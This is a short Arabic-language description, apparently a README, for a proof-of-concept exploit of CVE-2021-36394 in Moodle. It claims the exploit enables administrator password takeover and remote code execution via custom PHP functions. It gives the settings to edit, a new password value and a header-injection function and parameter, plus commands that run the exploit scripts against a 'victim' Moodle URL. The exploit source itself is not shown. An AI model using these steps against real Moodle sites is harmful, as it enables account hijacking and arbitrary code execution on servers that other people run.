
استغلال إثبات المفهوم لثغرة CVE-2021-36394 في Moodle، مما يتيح الاستيلاء على كلمة مرور المسؤول وتنفيذ تعليمات برمجية عن بُعد عبر وظائف PHP مخصصة.
كود مخصص
$newpassword = "Accounttakedover123";
ثم نفّذ:
$ CVE2021-36394.php http://victim/path_to_moodle
كود مخصص
$function = "header"; $param = "Hacked: by0d0ff9";
ثم نفّذ:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle